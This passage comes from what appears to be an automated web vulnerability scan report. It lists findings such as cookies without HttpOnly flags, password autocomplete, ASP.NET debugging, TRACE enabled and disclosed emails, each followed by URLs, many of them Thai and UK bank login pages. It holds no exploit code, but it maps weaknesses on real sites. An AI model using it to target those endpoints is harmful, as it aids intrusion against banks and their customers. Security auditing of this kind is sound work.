15.27. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm

15.28. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm

15.29. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

15.30. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

15.31. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

15.32. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

15.33. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

15.34. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

15.35. http://picasaweb.google.com/lh/view

15.36. http://pixel.33across.com/ps/

15.37. http://th.linkedin.com/in/narongchai

15.38. http://translate.google.com/translate

15.39. http://translate.google.com/translate_t

15.40. http://video.google.com/videoplay

15.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

15.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

15.43. http://www.bangkokpost.com/forum/viewtopic.php

15.44. http://www.coolthaihouse.com/forum/viewtopic.php

15.45. http://www.facebook.com/campaign/landing.php

15.46. http://www.facebook.com/pages/KTB-Care/178373518915

15.47. http://www.google.com/finance

15.48. http://www.multimap.com/clients/places.cgi

15.49. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

15.50. http://www.scriptlogic.com/

15.51. http://www.scriptlogic.com/int/am/prodsel/050709

15.52. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

15.53. http://www.youtube.com/results

15.54. http://www.youtube.com/watch

15.55. http://www2.itt-tech.edu/it/d/

15.56. http://www22.glam.com/cTagsImg.act

15.57. http://xcdn.xgraph.net/15530/db/xg.gif

16. Cookie without HttpOnly flag set

16.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp

16.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

16.3. https://csc.scb.co.th/webclient1/index.jsp

16.4. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

16.5. https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp

16.6. http://group.barclays.com/Citizenship/Community-Investment

16.7. http://group.barclays.com/Home

16.8. http://group.barclays.com/Sitemap

16.9. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship

16.10. http://group.barclays.com/cs/Satellite

16.11. http://group.barclays.com/favicon.ico

16.12. https://ibank.barclays.co.uk/olb/w/LoginMember.do

16.13. https://icustody.bangkokbank.com/Signon.aspx

16.14. https://ifunds.bangkokbank.com/Login.aspx

16.15. https://kcustodian.kasikornbank.com/KCustodian/

16.16. http://m1645.ic-live.com/515/

16.17. http://marketdata.set.or.th/mkt/topten.do

16.18. http://moneytalk.scb.co.th/

16.19. http://moneytalk.scb.co.th/

16.20. http://moneytalk.scb.co.th/index.asp

16.21. http://moneytalk.scb.co.th/index.asp

16.22. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

16.23. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

16.24. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

16.25. http://plugins.jquery.com/node/1208]

16.26. http://plugins.jquery.com/project/onImagesLoad

16.27. http://register2.set.or.th/semreg/detail.aspx

16.28. http://scb.dev-orisma.com/en/friends-of-scb

16.29. http://seal.controlcase.com/

16.30. http://th.linkedin.com/in/narongchai

16.31. http://trends.atipat.co.cc/thailand-breast-slap/x22

16.32. http://weblink.settrade.com/banner/banner3.jsp

16.33. http://wikipediareview.com/index.php

16.34. http://www.360travelguide.com/results.asp

16.35. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

16.36. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

16.37. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

16.38. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp

16.39. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

16.40. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

16.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

16.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

16.43. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx

16.44. https://www.barclays-home-insurance.co.uk/p4/barclays/SaveRetrieve/Saveandretrieveloginpage.aspx

16.45. http://www.barclays.co.uk/Currentaccounts/P1242557963414

16.46. http://www.barclays.co.uk/Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121

16.47. http://www.barclays.co.uk/Insurance/P1242557963438

16.48. http://www.barclays.co.uk/Loans/P1242557963420

16.49. http://www.barclays.co.uk/Mortgages/P1242557963476

16.50. http://www.barclays.co.uk/PersonalBanking/P1242557947640

16.51. http://www.barclays.co.uk/Savings/ISAs/H1242557860616

16.52. http://www.barclays.co.uk/cs/Satellite

16.53. https://www.bizpayment.ktb.co.th/epayview/

16.54. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol

16.55. http://www.controlcase.com/contact.php

16.56. http://www.controlcase.com/logon_page.php

16.57. http://www.independent.co.uk/news/world/asia/x26amp

16.58. http://www.independent.co.uk/news/world/x26amp

16.59. http://www.independent.co.uk/news/x26amp

16.60. http://www.khonkaen.com/english/forum/default.asp

16.61. http://www.khonkaen.com/english/forum/forum_posts.asp

16.62. http://www.khonkaen.com/english/forum/forum_topics.asp

16.63. http://www.ktam.co.th/en/index.php

16.64. http://www.ktb.co.th/en/main/

16.65. https://www.ktb.co.th/internetservice/onlineAccountAction.do

16.66. https://www.ktbonline.ktb.co.th/new/

16.67. http://www.mindworkscorp.com/

16.68. http://www.personal.barclays.co.uk/BRC1/jsp/brccontrol

16.69. http://www.scb.co.th/en/home

16.70. http://www.scb.co.th/en/home/

16.71. http://www.scb.co.th/scb_api/scbapi.jsp

16.72. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

16.73. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

16.74. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

16.75. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

16.76. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

16.77. http://www.scbeasy.com/

16.78. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

16.79. http://www.set.or.th/set/oppdaybyperiod.do

16.80. http://www.thailandhotelforums.com/forum/index.php

16.81. http://18.xg4ken.com/media/redir.php

16.82. http://419.myfunforum.org/sutra724.php/x22

16.83. http://a.unanimis.co.uk/fc.php

16.84. http://ad.yieldmanager.com/pixel

16.85. https://adwords.google.com/select/Login

16.86. https://adwords.google.com/um/StartNewLogin

16.87. http://answers.yahoo.com/dir/index

16.88. http://answers.yahoo.com/question/index

16.89. http://apps.barclays.co.uk/accessibility/

16.90. http://b.scorecardresearch.com/b

16.91. http://banner2.set.or.th/www/delivery/afr.php

16.92. http://banner2.set.or.th/www/delivery/afr.php

16.93. http://banner2.set.or.th/www/delivery/ck.php

16.94. http://banner2.set.or.th/www/delivery/lg.php

16.95. https://center.ktam.co.th/

16.96. http://cspix.media6degrees.com/orbserv/hbpix

16.97. http://dis.us.criteo.com/dis/dis.aspx

16.98. http://domdex.com/f

16.99. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json

16.100. https://ebank.kasikornbankgroup.com/kbiznet/login.html

16.101. http://edge.aperture.displaymarketplace.com/displayscript.js

16.102. https://feedback.live.com/default.aspx

16.103. http://get.adobe.com/flashplayer/

16.104. http://goto.ext.google.com/og-dogfood-issue

16.105. http://goto.ext.google.com/og-exp

16.106. http://html.aggregateknowledge.com/iframe

16.107. https://ibank.barclays.co.uk/

16.108. http://in.getclicky.com/in.php

16.109. http://ktbcare.hi5.com/

16.110. http://leadback.advertising.com/adcedge/lb

16.111. http://lvs.truehits.in.th/goggen.php

16.112. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

16.113. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

16.114. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

16.115. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

16.116. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm

16.117. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm

16.118. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

16.119. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

16.120. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

16.121. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

16.122. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

16.123. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

16.124. http://pixel.33across.com/ps/

16.125. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html

16.126. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655

16.127. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

16.128. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

16.129. http://statse.webtrendslive.com/dcsbkflpo00000kz4nrnh3kyv_9q5r/dcs.gif

16.130. http://statse.webtrendslive.com/dcssxcr8i00000stlemt7jpvp_8c9t/dcs.gif

16.131. http://tc.barclays.co.uk/Creditcards/P1242557963445

16.132. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/AdditionsActive/P1242557963802

16.133. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/CurrentAccountPlus/P1242557963790

16.134. http://tc.barclays.co.uk/Currentaccounts/P1242557963414

16.135. http://tc.barclays.co.uk/InfoBank/PersonalReserve/P1242557963784

16.136. http://tc.barclays.co.uk/Insurance/Carinsurance/Carinsurance/P1242557964058

16.137. http://tc.barclays.co.uk/Insurance/Homeinsurance/FinerHighValueHomeInsurance/P1242557964022

16.138. http://tc.barclays.co.uk/Insurance/IncomeInsurance/BarclaysIncomeInsurance/P1242570870016

16.139. http://tc.barclays.co.uk/Insurance/LifeInsurance/LifeInsurancefromAviva/P1242557963444

16.140. http://tc.barclays.co.uk/Insurance/P1242557963438

16.141. http://tc.barclays.co.uk/Loans/Ourloans/Personalloans/P1242557963928

16.142. http://tc.barclays.co.uk/Loans/P1242557963420

16.143. http://tc.barclays.co.uk/Mortgages/Fixedratemortgages/P1242557963470

16.144. http://tc.barclays.co.uk/PremierHomePage/P1242557952563

16.145. http://tc.barclays.co.uk/Savings/Comparesavingsaccounts/P1242564257686

16.146. http://tc.barclays.co.uk/Savings/FixedRateBonds/H1242557860616

16.147. http://tc.barclays.co.uk/Savings/ISAs/H1242557860616

16.148. http://tc.barclays.co.uk/Savings/P1242557963426

16.149. http://tc.barclays.co.uk/c

16.150. http://tc.barclays.co.uk/i

16.151. http://translate.google.com/translate

16.152. http://translate.google.com/translate_t

16.153. http://twitter.com/KBank_Live

16.154. http://twitter.com/ktb_care

16.155. http://twitter.com/scb_thailand

16.156. http://video.google.com/videoplay

16.157. http://webmail.aol.com/

16.158. http://www.barclays.com/privacy/com_privacy.html

16.159. https://www.bizpayment.ktb.co.th/epayview

16.160. http://www.facebook.com/pages/KTB-Care/178373518915

16.161. http://www.google.com/finance

16.162. https://www.google.com/accounts/Login

16.163. https://www.google.com/accounts/ServiceLogin

16.164. http://www.googleadservices.com/pagead/aclk

16.165. http://www.googleadservices.com/pagead/conversion/1005090170/

16.166. http://www.googleadservices.com/pagead/conversion/1032234781/

16.167. http://www.multimap.com/clients/places.cgi

16.168. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

16.169. https://www.newcb.ktb.co.th/

16.170. http://www.scriptlogic.com/

16.171. http://www.scriptlogic.com/int/am/prodsel/050709

16.172. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

16.173. http://www.yestheyrefake.net/vb/forumdisplay.php

16.174. http://www.yestheyrefake.net/vb/showthread.php

16.175. http://www.youtube.com/results

16.176. http://www.youtube.com/watch

16.177. http://www.zlmc.org/mindfulness-meditation.html

16.178. http://www2.itt-tech.edu/it/d/

16.179. http://www22.glam.com/cTagsImg.act

16.180. http://xcdn.xgraph.net/15530/db/xg.gif

17. Password field with autocomplete enabled

17.1. http://dl.scriptlogic.com/login/Combined.aspx

17.2. http://home.controlcase.com/piwik/

17.3. https://home.controlcase.com/piwik/

17.4. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

17.5. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

17.6. http://th.linkedin.com/in/narongchai

17.7. http://truehits.net/

17.8. http://truehits.net/stat.php

17.9. http://twitter.com/KBank_Live

17.10. http://twitter.com/ktb_care

17.11. http://twitter.com/scb_thailand

17.12. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

17.13. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

17.14. http://wikipediareview.com/index.php

17.15. http://wikipediareview.com/index.php

17.16. https://www.barclaysfantasyfundmanager.co.uk/

17.17. https://www.bizpayment.ktb.co.th/epayview/

17.18. http://www.controlcase.com/change_password.php

17.19. http://www.controlcase.com/logon_page.php

17.20. http://www.facebook.com/pages/KTB-Care/178373518915

17.21. https://www.google.com/accounts/Login

17.22. https://www.google.com/accounts/ServiceLogin

17.23. http://www.khonkaen.com/english/forum/default.asp

17.24. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

17.25. http://www.newsroom.barclays.com/webuser/newsextra.aspx

17.26. http://www.newsroom.barclays.com/webuser/register.aspx

17.27. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

17.28. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

17.29. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

17.30. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

17.31. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

17.32. http://www.thailandhotelforums.com/forum/index.php

17.33. http://www.thailandhotelforums.com/forum/index.php

17.34. http://www.yestheyrefake.net/vb/forumdisplay.php

17.35. http://www.yestheyrefake.net/vb/showthread.php

18. Source code disclosure

18.1. http://www.ktb.co.th/flash/a2.swf

18.2. http://www.ktb.co.th/flash/a3.swf

18.3. http://www.ktb.co.th/flash/c3.swf

18.4. http://www.ktb.co.th/flash/d2.swf

18.5. http://www.ktb.co.th/flash/d3.swf

18.6. http://www.ktb.co.th/flash/e3.swf

18.7. http://www.ktb.co.th/flash/f2.swf

18.8. http://www.ktb.co.th/flash/home_show_flash2.swf

18.9. http://www.ktb.co.th/flash/ktb_group_eng.swf

19. ASP.NET debugging enabled

19.1. http://dl.scriptlogic.com/Default.aspx

19.2. http://register2.set.or.th/Default.aspx

19.3. http://www.bot.or.th/Default.aspx

19.4. https://www.ktamsmarttrade.com/Default.aspx

20. Referer-dependent response

20.1. http://weblink.settrade.com/banner/banner3.jsp

20.2. http://www.facebook.com/plugins/like.php

20.3. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

20.4. http://www2.itt-tech.edu/it/d/

21. Cross-domain POST

21.1. http://jscrollpane.kelvinluck.com/

21.2. http://webcache.googleusercontent.com/search

21.3. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

22. Cross-domain Referer leakage

22.1. http://0.r.msn.com/

22.2. http://318395.r.msn.com/

22.3. http://914188.r.msn.com/

22.4. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.5. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.6. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.8. http://answers.yahoo.com/dir/index

22.9. http://answers.yahoo.com/question/index

22.10. http://dl.scriptlogic.com/login/Combined.aspx

22.11. http://get.adobe.com/flashplayer/

22.12. http://googleads.g.doubleclick.net/pagead/ads

22.13. http://googleads.g.doubleclick.net/pagead/ads

22.14. http://googleads.g.doubleclick.net/pagead/ads

22.15. http://googleads.g.doubleclick.net/pagead/ads

22.16. http://googleads.g.doubleclick.net/pagead/ads

22.17. http://marketdata.set.or.th/mkt/topten.do

22.18. http://moneytalk.scb.co.th/index.asp

22.19. http://news.google.com/news/story

22.20. http://picasaweb.google.com/lh/view

22.21. http://picasaweb.google.com/lh/view

22.22. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php

22.23. http://translate.google.com/translate_t

22.24. http://translate.google.com/translate_t

22.25. http://truehits.net/stat.php

22.26. http://webcache.googleusercontent.com/search

22.27. http://webcache.googleusercontent.com/search

22.28. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

22.29. http://www.barclays.co.uk/Savings/ISAs/H1242557860616

22.30. http://www.facebook.com/plugins/like.php

22.31. http://www.facebook.com/plugins/like.php

22.32. http://www.google.com/recaptcha/api/js/recaptcha_ajax.js

22.33. http://www.google.com/search

22.34. http://www.google.com/search

22.35. http://www.google.com/search

22.36. http://www.google.com/search

22.37. http://www.google.com/url

22.38. http://www.google.com/url

22.39. http://www.googleadservices.com/pagead/conversion/1032234781/

22.40. http://www.kasikornbank.com/Pages/truehitsstat.html

22.41. http://www.ktam.co.th/media_box.php

22.42. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

22.43. http://www.newsroom.barclays.com/content/Detail.aspx

22.44. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

22.45. http://www.sedoparking.com/search/registrar.php

22.46. http://www.set.or.th/set/oppdaybyperiod.do

22.47. http://www.zlmc.org/mindfulness-meditation.html

22.48. http://www2.itt-tech.edu/it/d/

23. Cross-domain script include

23.1. http://adomas.org/javascript-mouse-wheel/

23.2. http://answers.yahoo.com/dir/index

23.3. http://answers.yahoo.com/dir/index

23.4. http://answers.yahoo.com/question/index

23.5. https://apps.barclays.co.uk/webchat/invite_accept.jpg/u0022

23.6. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022

23.7. https://apps.barclays.co.uk/webchat/invite_decline_bottom.jpg/u0022

23.8. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand

23.9. http://dl.scriptlogic.com/login/Combined.aspx

23.10. http://docs.jquery.com/UI

23.11. http://docs.jquery.com/UI/Accordion

23.12. http://docs.jquery.com/UI/Button

23.13. http://docs.jquery.com/UI/Effects/

23.14. http://docs.jquery.com/UI/Effects/Slide

23.15. http://docs.jquery.com/UI/Mouse

23.16. http://docs.jquery.com/UI/Slider

23.17. http://docs.jquery.com/UI/Widget

23.18. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand

23.19. http://googleads.g.doubleclick.net/pagead/ads

23.20. http://group.barclays.com/Citizenship/Community-Investment

23.21. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship

23.22. http://group.barclays.com/favicon.ico

23.23. http://img.sedoparking.com/jspartner/google.js

23.24. http://ipinfusion.com/js/header.js

23.25. http://ja.wikipedia.org/wiki/ă?żă?¤ă?®é??čˇ?ă?®ä¸?覧

23.26. http://javascript.nwbox.com/IEContentLoaded/

23.27. http://jquery.com/

23.28. http://jqueryui.com/about

23.29. http://jscrollpane.kelvinluck.com/

23.30. http://marketdata.set.or.th/mkt/topten.do

23.31. http://marketdata.set.or.th/search.html

23.32. http://nerdbots.com/services.html

23.33. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

23.34. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

23.35. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

23.36. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

23.37. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

23.38. http://picasaweb.google.com/lh/view

23.39. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22

23.40. http://sorgalla.com/

23.41. http://sorgalla.com/jcarousel/

23.42. http://th.wikipedia.org/wiki/ราย�ื�อ��า�าร���ระ��ศ��ย

23.43. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en

23.44. http://translatewiki.net/wiki/MediaWiki:Collapsible-expand/en

23.45. http://trends.atipat.co.cc/thailand-breast-slap/x22

23.46. http://truehits.net/

23.47. http://truehits.net/stat.php

23.48. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/

23.49. http://twitter.com/KBank_Live

23.50. http://twitter.com/ktb_care

23.51. http://twitter.com/scb_thailand

23.52. http://webcache.googleusercontent.com/search

23.53. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

23.54. http://wikimediafoundation.org/wiki/Privacy_policy

23.55. http://wikimediafoundation.org/wiki/Terms_of_Use

23.56. http://wuu.wikipedia.org/wiki/泰���

23.57. http://www.360travelguide.com/results.asp

23.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

23.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

23.60. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

23.61. http://www.bangkokpost.com/forum/viewtopic.php

23.62. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx

23.63. http://www.barclaysannualreports.com/ar2010/index.asp

23.64. http://www.bot.or.th/english/Pages/BOTDefault.aspx

23.65. http://www.coolthaihouse.com/forum/viewtopic.php

23.66. http://www.facebook.com/pages/KTB-Care/178373518915

23.67. http://www.facebook.com/plugins/like.php

23.68. http://www.independent.co.uk/news/world/asia/x26amp

23.69. http://www.independent.co.uk/news/world/x26amp

23.70. http://www.independent.co.uk/news/x26amp

23.71. http://www.kasikornbank.com/Pages/truehitsstat.html

23.72. http://www.khonkaen.com/english/forum/default.asp

23.73. http://www.ktb.co.th/en/ktb_group/main.jsp

23.74. http://www.ktb.co.th/en/main/

23.75. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

23.76. http://www.newsroom.barclays.com/content/Detail.aspx

23.77. http://www.scb.co.th/en/home

23.78. http://www.scb.co.th/en/home/

23.79. http://www.scriptlogic.com/

23.80. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

23.81. http://www.sedoparking.com/search/registrar.php

23.82. http://www.set.or.th/en/contact/contact.html

23.83. http://www.set.or.th/en/index.html

23.84. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

23.85. http://www.set.or.th/en/products/index/setindex_p1.html

23.86. http://www.set.or.th/en/regulations/cg/roles_p1.html

23.87. http://www.set.or.th/en/sitemap/for_listing.html

23.88. http://www.set.or.th/nicepage_404.html

23.89. http://www.set.or.th/search.html

23.90. http://www.set.or.th/set/oppdaybyperiod.do

23.91. http://www.set.or.th/th/index.html

23.92. http://www.thailandhotelforums.com/forum/index.php

23.93. http://www.youtube.com/results

23.94. http://www2.itt-tech.edu/it/d/

24. File upload functionality

25. TRACE method is enabled

25.1. http://18.xg4ken.com/

25.2. http://2-thai.com/

25.3. http://a.unanimis.co.uk/

25.4. http://de.wikipedia.org/

25.5. http://en.wikipedia.org/

25.6. http://formlessnetworking.com/

25.7. http://home.controlcase.com/

25.8. https://home.controlcase.com/

25.9. http://ipinfusion.com/

25.10. http://ja.wikipedia.org/

25.11. http://javascript.nwbox.com/

25.12. http://jquery.com/

25.13. http://jquery.org/

25.14. https://ksupplychain.kasikornbank.com/

25.15. http://meta.wikimedia.org/

25.16. http://metrics.seenon.com/

25.17. http://mls.marchex.com/

25.18. https://online.kasikornbankgroup.com/

25.19. http://picasaweb.google.com/

25.20. http://piwik.org/

25.21. http://plugins.jquery.com/

25.22. http://register2.set.or.th/

25.23. http://rtradeinfo.bualuang.co.th/

25.24. http://scriptlogiccorp.d2.sc.omtrdc.net/

25.25. https://secure.wikimedia.org/

25.26. http://sizzlejs.com/

25.27. http://th.wikipedia.org/

25.28. http://thailandforvisitors.com/

25.29. http://trends.atipat.co.cc/

25.30. http://validator.w3.org/

25.31. http://wiki.answers.com/

25.32. http://wikimediafoundation.org/

25.33. http://wuu.wikipedia.org/

25.34. http://www.1day1year.com/

25.35. http://www.bangkokpost.com/

25.36. http://www.coolthaihouse.com/

25.37. http://www.formlessnetworking.com/

25.38. http://www.ktam.co.th/

25.39. http://www.thailandguru.com/

25.40. http://www.thailandhotelforums.com/

25.41. http://www2.itt-tech.edu/

26. Email addresses disclosed

26.1. http://419.myfunforum.org/sutra724.php/x22

26.2. http://adomas.org/javascript-mouse-wheel/

26.3. http://en.wikipedia.org/w/index.php

26.4. http://investors.fiserv.com/releasedetail.cfm

26.5. http://jqueryui.com/about

26.6. http://marketdata.set.or.th/scripts/JSCookMenu.js

26.7. http://moneytalk.scb.co.th/Scripts/jquery.mousewheel.js

26.8. http://nerdbots.com/contact.aspx

26.9. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

26.10. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

26.11. http://register2.set.or.th/styles/calendar/popBirthdate.js

26.12. http://truehits.net/stat.php

26.13. http://twitter.com/KBank_Live

26.14. http://validator.w3.org/check

26.15. http://www.bangkokbank.com/_layouts/NR/JavaScript/CommonClient.js

26.16. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

26.17. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

26.18. http://www.bangkokpost.com/forum/viewtopic.php

26.19. http://www.bot.or.th/english/Pages/BOTDefault.aspx

26.20. https://www.google.com/accounts/Login

26.21. https://www.google.com/accounts/ServiceLogin

26.22. http://www.independent.co.uk/news/world/asia/x26amp

26.23. http://www.independent.co.uk/news/world/x26amp

26.24. http://www.independent.co.uk/news/x26amp

26.25. http://www.ktam.co.th/en/alliance.php

26.26. http://www.ktam.co.th/en/index.php

26.27. http://www.ktam.co.th/en/index.php/a

26.28. http://www.ktam.co.th/en/index.php/declarationnav.php

26.29. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif

26.30. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif

26.31. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif

26.32. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif

26.33. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif

26.34. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif

26.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif

26.36. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif

26.37. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif

26.38. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif

26.39. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif

26.40. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif

26.41. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif

26.42. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif

26.43. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif

26.44. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif

26.45. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif

26.46. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif

26.47. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif

26.48. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif

26.49. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif

26.50. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif

26.51. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif

26.52. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif

26.53. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif

26.54. http://www.ktam.co.th/en/index.php/ims/empty.gif

26.55. http://www.ktam.co.th/en/index.php/ims/h_download1.gif

26.56. http://www.ktam.co.th/en/index.php/ims/h_link1.gif

26.57. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif

26.58. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif

26.59. http://www.ktam.co.th/en/index.php/ims/i_flash.gif

26.60. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif

26.61. http://www.ktam.co.th/en/index.php/ims/mails.png

26.62. http://www.ktam.co.th/en/index.php/ims/news.php

26.63. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif

26.64. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif

26.65. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif

26.66. http://www.ktam.co.th/en/index.php/ims/p_line001.gif

26.67. http://www.ktam.co.th/en/index.php/ims/p_line002.gif

26.68. http://www.ktam.co.th/en/index.php/ims/p_link01.gif

26.69. http://www.ktam.co.th/en/index.php/ims/p_link02.gif

26.70. http://www.ktam.co.th/en/index.php/ims/p_link03.gif

26.71. http://www.ktam.co.th/en/index.php/ims/p_link04.gif

26.72. http://www.ktam.co.th/en/index.php/ims/p_link05.gif

26.73. http://www.ktam.co.th/en/index.php/ims/p_link06.gif

26.74. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif

26.75. http://www.ktam.co.th/en/index.php/ims/p_word1.gif

26.76. http://www.ktam.co.th/en/index.php/media_box.php

26.77. http://www.ktam.co.th/en/index.php/news.inc.php

26.78. http://www.ktam.co.th/en/index.php/news.php

26.79. http://www.ktam.co.th/en/index.php/self_discovery.php

26.80. http://www.ktam.co.th/en/index.php/style/news.php

26.81. http://www.ktam.co.th/en/index.php/style/page.txt

26.82. http://www.ktam.co.th/en/news.php

26.83. http://www.ktam.co.th/th/news.php

